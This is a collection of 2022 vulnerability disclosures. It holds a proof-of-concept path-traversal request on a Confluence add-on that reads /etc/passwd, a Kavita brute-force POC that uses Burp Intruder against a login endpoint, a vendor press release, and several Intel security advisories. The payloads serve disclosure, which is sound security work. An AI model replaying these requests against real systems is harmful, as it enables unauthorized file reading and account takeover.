In the Netic User Export add-on before 1.3.5 for Atlassian Confluence, authorization is mishandled. An unauthenticated attacker could access files on the remote system.

Vulnerability Type: Unauthenticated Arbitrary File Read

Vendor of Product: Atlassian Confluence

Affected Product Code Base: User Export for Confluence

Product Version: < 1.3.5

Description: The Netic User Export add-on before 1.3.5 for Atlassian Confluence has the functionality to generate a list of users in the application, and export it. During export, the HTTP request has a fileName parameter that accepts any file on the system (e.g., an SSH private key) to be downloaded.

Attack Vectors: Attacker could make an HTTP request to the affected endpoint and download any file from the system.

Attack Type: Remote

Endpoint: /plugins/servlet/confluenceuserexport/admin/download

Assigned CVE-ID: CVE-2022-42977, CVE-2022-42978

Steps To Reproduce

1\. Issue a HTTP POST/GET request to the following endpoint: https://<confluence.example.com>/plugins/servlet/confluenceuserexport/admin/download?fileName=\[file-path\]

#PoC

\[REQUEST\]

GET /plugins/servlet/confluenceuserexport/admin/download?fileName=../../../../../../etc/passwd HTTP/1.1

Host: confluence.example.local

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.54 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9

\[RESPONSE\]

HTTP/1.1 401

Set-Cookie: JSESSIONID=ABCDEFGHIJKLMNOPQRSTUVWYZ; Path=/; HttpOnly

WWW-Authenticate: OAuth realm="confluence.example.local"

Content-Disposition: attachment; filename=../../../../../etc/os-release

Content-Type: text/html;charset=UTF-8

Content-Length: 407

Not AuthorizedNAME="CentOS Linux"

VERSION="7 (Core)"

ID="centos"

CVE-2022-42978: Unauthenticated Arbitrary File Read

Authentication Bypass by Primary Weakness in GitHub repository kareadita/kavita prior to 0.6.0.3.

The migrate-email endpoint is requiring Email, Username, and Password parameter. This endpoint contain authentication functionality that doesn't have any protection from brute-force attack, which allows an attacker to try every possible password combination without any restriction.

**CWE-307: Improper Restriction of Excessive Authentication Attempts****POC****1\. Send this request to Burpsuite Intruder**

    POST /api/account/migrate-email HTTP/1.1
    Host: 192.168.189.132:5000
    Accept: application/json, text/plain, */*
    DNT: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
    Referer: http://192.168.189.132:5000/admin/dashboard
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9,id-ID;q=0.8,id;q=0.7,ar-SA;q=0.6,ar;q=0.5
    Connection: close
    Content-Type: application/json
    Content-Length: 67
    
    {"Email":"xxx@local.com",
    "Username":"admin",
    "Password":"xxx"
    }
    

**2\. Mark on the Password value**

**3\. Bruteforce attack with 1000 password list and get valid admin password**

**Impact**

An attacker could perform a brute-force attack targeting normal and administrative users, using different passwords and eventually gain access to the targeted account, without any restriction.

CVE-2022-3993: No Rate Limit On migrate-email Endpoint Leads to Brute-force Attack in kavita

Designation recognizes highest caliber of information security.

**PLEASANTON, Calif., Nov. 14, 2022 /PRNewswire/** — Avatier, the industry leader in identity and access management, today announced it has received ISO 27001:2013 certification for its Information Security Management System (ISMS).

ISO 27001:2013 is an information security standard published by the International Organization for Standardization (ISO), the world's largest developer of voluntary international standards, and the International Electrotechnical Commission (IEC). Avatier's certification was issued by A-LIGN, an independent and accredited certification body based in the United States, on the successful completion of a formal audit process. This certification is evidence that Avatier has met rigorous international standards in ensuring the confidentiality, integrity, and availability of the Avatier Identity Anywhere platform.

Avatier develops identity management and governance platforms that enable organizations to scale faster, innovate quicker and embrace change more securely. Avatier's identity access management (IAM) and identity governance and administration (IGA) solutions do not require client software, so management is in real-time across any platform, such as Google Chrome, Microsoft Teams, or iOS and Android.

"This certification demonstrates Avatier's continued commitment to information security at every level and ensures our customers that the security of their data and information has been addressed, implemented, and properly controlled in all areas of their organization," said Jeremy Russeau, Avatier CISO.

**About Avatier Corporation**

Avatier is the Identity Management company of the future with innovative solutions for today. Avatier develops a "state of the art" identity management platform enabling workforce collaboration resulting in better customer experiences and increased revenue. The company's Identity Anywhere platform uses container technology, providing maximum flexibility, scalability and security in a platform-independent and portable solution that future-proofs your investment. Avatier's identity management and access governance solutions make the world's largest organizations more secure and productive in the shortest time at the lowest costs. Avatier brings all your back-office business applications and employee assets together and manages them as one.

For more information, visit www.avatier.com.

**SOURCE:** Avatier

Avatier Achieves ISO 27001 Certification for its Information Security Management System

Improper input validation for some Intel(R) PROSet/Wireless WiFi, Intel vPro(R) CSME WiFi and Killer(TM) WiFi products may allow unauthenticated user to potentially enable denial of service via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® PROSet/Wireless WiFi, Intel vPro® CSME WiFi and Killer™ WiFi Advisory**

**Summary: **

A potential security vulnerability in some Intel® PROSet/Wireless WiFi, Intel vPro® CSME WiFi and Killer™ WiFi products may allow denial of service. Intel is releasing a firmware update to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-26047

Description: Improper input validation for some Intel(R) PROSet/Wireless WiFi, Intel vPro(R) CSME WiFi  and Killer(TM) WiFi products may allow unauthenticated user to potentially enable denial of service via local access.

CVSS Base Score: 4.3 Medium

CVSS Vector:  CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

**Affected Products:**

Intel® PROSet/Wireless WiFi firmware before version 22.140, Killer™ WiFi firmware before version 3.1122.3158 and UEFI version 2.2.14.22176.2.

**CVE ID**

**Affected Products**

**Affected OS**

CVE-2022-26047

Intel® Wi-Fi 6E AX411

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

Intel® Wi-Fi 6 AX201

Intel® Wi-Fi 6 AX200

Windows 10 & 11

Linux

Chrome OS

UEFI

CSME

CVE-2022-26047

Killer™ Wi-Fi 6E AX1690

Killer™ Wi-Fi 6E AX1675

Killer™ Wi-Fi 6 AX1650

Windows 10 & 11

**Recommendations:**

**Windows:**

Intel recommends updating Intel® PROSet/Wireless WiFi software to version 22.140 or later.

Updates are available for download at this location:

https://www.intel.com/content/www/us/en/download/19351/windows-10-and-windows-11-wi-fi-drivers-for-intel-wireless-adapters.html

Intel recommends updating Killer™ WiFi software to version 3.1122.3158 or later.

Updates for Killer™ products are available for download at this location:

https://www.intel.com/content/www/us/en/download/19779/intel-killer-performance-suite.html?wapkw=killer

**UEFI:**

Intel recommends updating Intel® PROSet/Wireless WiFi UEFI drivers to version 2.2.14.22176 or later.

Please contact your OEM support group to obtain the correct driver version.

**Chrome OS:**

Intel® PROSet/Wireless WiFi drivers to mitigate this vulnerability will be up streamed to Chromium by November 08, 2022.

For any Google Chrome OS solution and schedule, please contact Google directly.

**Linux OS:**

Intel® PROSet/Wireless WiFi drivers to mitigate this vulnerability will be up streamed by November 08, 2022.

Consult the regular open-source channels to obtain this update.

**Recommendation for Intel vPRO® CSME WiFi products:**

Intel recommends updating Intel vPRO® CSME WiFi products to the following versions or newer.

**Platform**

**CSME Version**

**Device**

12th Generation Intel® Core Processor

16.1.25.1885v2

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

12th Generation Intel® Core Processor – Performance cores

16.1.25.1865v6.1

Intel® Wi-Fi 6E AX211

Intel® Wi-Fi 6E AX210

11th Generation Intel® Core Processor

15.0.42.2235

Intel® Wi-Fi 6 AX210

Intel® Wi-Fi 6 AX201

Intel® Wi-Fi 6 AX200

10th Generation Intel® Core Processor

14.1.67.2046

Intel® Wi-Fi 6E AX210

Intel® Wi-Fi 6 AX201

ntel® Wi-Fi 6 AX200

9th Generation Intel® Core Processor

12.0.92.2145v3

Intel® Wi-Fi 6 AX200

8th Generation Intel® Core Processor

12.0.92.2145v3

Intel® Wi-Fi 6 AX200

Intel recommends that users of Intel® vPRO® CSME WiFi products update to the latest version provided by the system manufacturer that addresses these issues.  

**Acknowledgements:**

The following issue was found internally by an Intel employee.  Intel would like to thank Julien Lenoir.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-26047: INTEL-SA-00699

Uncontrolled search path element in the PresentMon software maintained by Intel(R) before version 1.7.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**PresentMon Advisory**

**Summary: **

A potential security vulnerability in the PresentMon software maintained by Intel® may allow escalation of privilege. Intel is releasing software updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-26086

Description: Uncontrolled search path element in the PresentMon software maintained by Intel(R) before version 1.7.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score: 6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

**Affected Products:**

PresentMon software maintained by Intel® before version 1.7.1.

**Recommendations:**

Intel recommends updating the PresentMon software maintained by Intel® to version 1.7.1 or later.

Updates are available for download at this location:

https://github.com/GameTechDev/PresentMon/releases

**Acknowledgements:**

Intel would like to thank avivanoa for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-26086: INTEL-SA-00711

Uncontrolled search path in the software installer for Intel(R) System Studio for all versions, may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® System Studio Advisory**

**Summary: **

A potential security vulnerability in the Intel® System Studio software may allow escalation of privilege.  Intel is not releasing updates to mitigate this potential vulnerability and has issued a Product Discontinuation Notice for Intel® System Studio software.

**Vulnerability Details:**

CVEID: CVE-2021-33064

Description: Uncontrolled search path in the software installer for Intel(R) System Studio for all versions, may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score:  6.7 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

**Affected Products:**

Intel® System Studio software all versions.

**Recommendations:**

Intel has issued a Product Discontinuation Notice for the Intel® System Studio software and recommends that users of the Intel® System Studio software uninstall it or discontinue use at their earliest convenience.

 Intel® oneAPI is considered as the successor product to replace the System Studio software. Intel® oneAPI installer is based on code which does not have the issue in question.

**Acknowledgements:**

Intel would like to thank houjingyi for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2021-33064: INTEL-SA-00558

Improper authentication in subsystem for Intel(R) AMT before versions 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25 may allow a privileged user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2022.3 IPU - Intel® Chipset Firmware Advisory**

Intel ID:

INTEL-SA-00610

Advisory Category:

Firmware

Impact of vulnerability:

Escalation of Privilege, Denial of Service

Severity rating:

HIGH

Original release:

11/08/2022

Last revised:

11/08/2022

**Summary: **

Potential security vulnerabilities in some Intel® Chipset Firmware in Intel® Converged Security and Manageability Engine (CSME), Intel® Active Management Technology (AMT) and Intel® Server Platform Services (SPS) may allow escalation of privilege or denial of service.  Intel is releasing firmware updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2022-26845

Description: Improper authentication in firmware for Intel(R) AMT before versions 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25 may allow an unauthenticated user to potentially enable escalation of privilege via network access.

CVSS Base Score: 8.7 High

CVSS Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N

CVEID: CVE-2022-27497

Description: Null pointer dereference in firmware for Intel(R) AMT before version 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25 may allow an unauthenticated user to potentially enable denial of service via network access.

CVSS Base Score: 8.6 High

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H

CVEID: CVE-2022-29893

Description: Improper authentication in firmware for Intel(R) AMT before versions 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25 may allow an authenticated user to potentially enable escalation of privilege via network access.

CVSS Base Score: 8.1 High

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N

CVEID: CVE-2021-33159

Description: Improper authentication in subsystem for Intel(R) AMT before versions 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25 may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score:  7.4 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:C/C:N/I:H/A:H

CVEID: CVE-2022-29466

Description: Improper input validation in firmware for Intel(R) SPS before version SPS\_E3\_04.01.04.700.0 may allow an authenticated user to potentially enable denial of service via local access.

CVSS Base Score: 7.3 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:H

CVEID: CVE-2022-29515

Description: Missing release of memory after effective lifetime in firmware for Intel(R) SPS before versions SPS\_E3\_06.00.03.035.0 may allow a privileged user to potentially enable denial of service via local access.

CVSS Base Score: 6.0 Medium

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H

**Affected Products:**

Intel® CSME before versions 11.8.93, 11.22.93, 11.12.93, 12.0.92, 14.1.67, 15.0.42, 16.1.25.

Intel® AMT before versions 11.8.93, 11.22.93, 12.0.92, 14.1.67, 15.0.42, 16.0.

Intel® SPS before versions SPS\_E3\_04.01.04.700.0, SPS\_E3\_06.00.03.035.0.

**Recommendations:**

Intel recommends that users of Intel® CSME, Intel® AMT and Intel® SPS update to the latest version provided by the system manufacturer that addresses these issues.

**Acknowledgements:**

These issues were found internally by Intel employees.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2021-33159: INTEL-SA-00610

Time-of-check time-of-use race condition in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**2022.3 IPU – BIOS Advisory**

**Summary: **

Potential security vulnerabilities in the BIOS firmware for some Intel® Processors may allow escalation of privilege.  Intel is releasing firmware updates to mitigate these potential vulnerabilities.

**Vulnerability Details:**

CVEID: CVE-2022-26006

Description: Improper input validation in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 8.2 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

CVEID: CVE-2022-21198

Description: Time-of-check time-of-use race condition in the BIOS firmware for some Intel(R) Processors may allow a privileged user to potentially enable escalation of privilege via local access.

CVSS Base Score: 7.9 High

CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:H/A:H

**Affected Products:**

CVE-2022-26006

**Product Collection**

**Vertical Segment**

**CPU ID**

**Platform ID**

Intel® Xeon® Processor E5 v3 Family

Server

306F2

6F

Intel® Xeon® Processor E5 v4 Family,  
Intel® Core™ X-Series Processors

Server

406F1

EF

_1This product has met its End of Servicing Updates (ESU).  For customers interested in extending updates beyond ESU, please contact your Intel representative for details._

CVE-2022-21198

**Product Collection**

**Vertical Segment**

**CPU ID**

**Platform ID**

11th Gen Intel® Core™ processor

Intel® Xeon® W processor

Server, Workstation

A0671

02

11th Gen Intel® Core™ processor family

Desktop

A0671

02

11th Generation Intel® Core Processor Family

Mobile

806D1

806C1

806C2

C2

80

12th Generation Intel® Core™ Processor Family

Intel® Pentium® Gold Processor Family

Intel® Celeron® Processor Family

Desktop

90672

90675

01

12th Generation Intel® Core Processor Family

Mobile

906A3  
906A4

11

12th Generation Intel® Core™ Processor Family

Intel® Pentium® Gold Processor Family

Intel® Celeron® Processor Family

Mobile

906A4

07

10th Generation Intel® Core™ Processor Family

Mobile

706E5

80

Intel® Core™ Processors with Intel® Hybrid Technology

Mobile

806A1

10

Intel® Pentium® Silver N6000 Processor Family, Intel® Celeron® N4000 and N5000 Processor Families

Desktop,

Mobile

906C0

01

10th Generation Intel® Core™ Processors

Desktop,

Workstation

A0653

A0655

22

10th Generation Intel® Core™ Processors

Intel® Xeon® W processor family

Mobile,

Workstation

A0660

A0661

80

10th Generation Intel® Core™ Processor Family

Intel® Xeon® W processor family

Mobile,

Workstation

A0652

20

10th Gen Intel® Core™ processor

10000/1200 series

Pentium® Gold processor series

Celeron® processor 5000 series

Mobile

806EC

94

**Recommendations:**

Intel recommends that users of listed Intel® Processors update to the latest versions provided by the system manufacturer that addresses these issues.

**Acknowledgements:**

These  issues were found internally by Intel employees.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

**Legal Notices and Disclaimers**

Intel provides these materials as-is, with no express or implied warranties.

All products, dates, and figures specified are preliminary based on current expectations, and are subject to change without notice.

Intel products and services described may contain design defects or errors known as errata, which may cause the product to deviate from published specifications. Current characterized errata are available on request.

Intel products that have met their End of Servicing Updates may no longer receive functional and security updates. For additional details on support and servicing, please see this help article. 

Intel technologies’ features and benefits depend on system configuration and may require enabled hardware, software or service activation. Performance varies depending on system configuration. No product or component can be absolutely secure. Check with your system manufacturer or retailer or learn more at http://intel.com.

Some results have been estimated or simulated using internal Intel analysis or architecture simulation or modeling, and provided to you for informational purposes. Any differences in your system hardware, software or configuration may affect your actual performance.

Intel and the Intel logo are trademarks of Intel Corporation or its subsidiaries in the United States and other countries.

\*Other names and brands may be claimed as the property of others.  

Copyright © Intel Corporation 2022

**Report a Vulnerability**

If you have information about a security issue or vulnerability with an **Intel branded product or technology**, please send an e-mail to secure@intel.com. Encrypt sensitive information using our PGP public key.

Please provide as much information as possible, including:

*   The products and versions affected
*   Detailed description of the vulnerability
*   Information on known exploits

A member of the Intel Product Security Team will review your e-mail and contact you to collaborate on resolving the issue. For more information on how Intel works to resolve security issues, see:

*   Vulnerability handling guidelines

For issues related to Intel's external web presence (Intel.com and related subdomains), please contact Intel's External Security Research team.

**Need product support?**

If you...

*   Have questions about the security features of an Intel product
*   Require technical support
*   Want product updates or patches

  
Please visit Support & Downloads.

*   Report a Vulnerability
*   Product Support

CVE-2022-21198: INTEL-SA-00688

Improper access control in the Intel(R) NUC HDMI Firmware Update Tool for NUC7i3DN, NUC7i5DN and NUC7i7DN before version 1.78.2.0.7 may allow an authenticated user to potentially enable escalation of privilege via local access.

**Select Your Region**

Sign In to access restricted content

**Using Intel.com Search**

You can easily search the entire Intel.com site in several ways.

*   Brand Name: **Core i9**
*   Document Number: **123456**
*   Code Name: **Alder Lake**
*   Special Operators: **“Ice Lake”, Ice AND Lake, Ice OR Lake, Ice\***

**Quick Links**

You can also try the quick links below to see results for most popular searches.

*   Product Information
*   Support
*   Drivers & Software

**Recent Searches**

Sign In to access restricted content

**Advanced Search**

**Only search in**

Title Description Content ID

Sign in to access restricted content.

The browser version you are using is not recommended for this site.  
Please consider upgrading to the latest version of your browser by clicking one of the following links.

*   Safari
*   Chrome
*   Edge
*   Firefox

**Intel® NUC HDMI Firmware Update Tool Advisory**

**Summary: **

A potential security vulnerability in the Intel® NUC HDMI Firmware Update Tool for NUC7i3DN, NUC7i5DN and NUC7i7DN may allow escalation of privilege.  Intel is releasing software updates to mitigate this potential vulnerability.

**Vulnerability Details:**

CVEID: CVE-2022-26024

Description: Improper access control in the Intel(R) NUC HDMI Firmware Update Tool for NUC7i3DN, NUC7i5DN and NUC7i7DN before version 1.78.2.0.7 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVSS Base Score:  6.7 Medium

CVSS Vector:  CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H

**Affected Products:**

Intel® NUC HDMI Firmware Update Tool for NUC7i3DN, NUC7i5DN and NUC7i7DN before version 1.78.2.0.7.

**Recommendations:**

Intel recommends updating the Intel® NUC HDMI Firmware Update Tool for NUC7i3DN, NUC7i5DN and NUC7i7DN to version 1.78.2.0.7 or later.

Updates are available for download at this location:

https://www.intel.com/content/www/us/en/download/19749/hdmi-firmware-update-tool-for-nuc7i3dn-nuc7i5dn-nuc7i7dn.html

**Acknowledgements:**

Intel would like to thank Hazem Brini ( 7azimo - Jungsu ) for reporting this issue.

Intel, and nearly the entire technology industry, follows a disclosure practice called Coordinated Disclosure, under which a cybersecurity vulnerability is generally publicly disclosed only after mitigations are available.

**Revision History**

Revision

Date

Description

1.0

11/08/2022

Initial Release

